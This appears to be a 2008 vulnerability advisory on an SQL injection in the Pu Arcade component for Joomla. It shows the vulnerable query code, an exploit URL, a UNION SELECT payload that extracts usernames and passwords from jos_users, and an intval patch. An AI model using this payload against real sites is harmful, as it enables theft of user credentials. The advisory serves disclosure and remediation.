Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19614
HistoryApr 10, 2008 - 12:00 a.m.

Pu Arcade component for Joomla - SQL injection

2008-04-1000:00:00
vulners.com
35

I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .

SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .

Author : MantiS

Vulnerable code :

function warningByGame($gid) {
global $database;

    $query = &quot;SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM

#__puarcade_games as g, #__puarcade_contentrating as c"
. " WHERE g.contentratingid = c.id"
. " AND g.id = $gid";
$database->setQuery($query);
$cont = $database->loadObjectList();

Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&amp;Itemid=1&amp;gid=[SQL INJECTION]

Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users–" (5 columns) .

Patch :

Place before "$query = "SELECT c.id… " :
$gid = intval($_GET['gid']);
To force $gid variable conversion at an integer .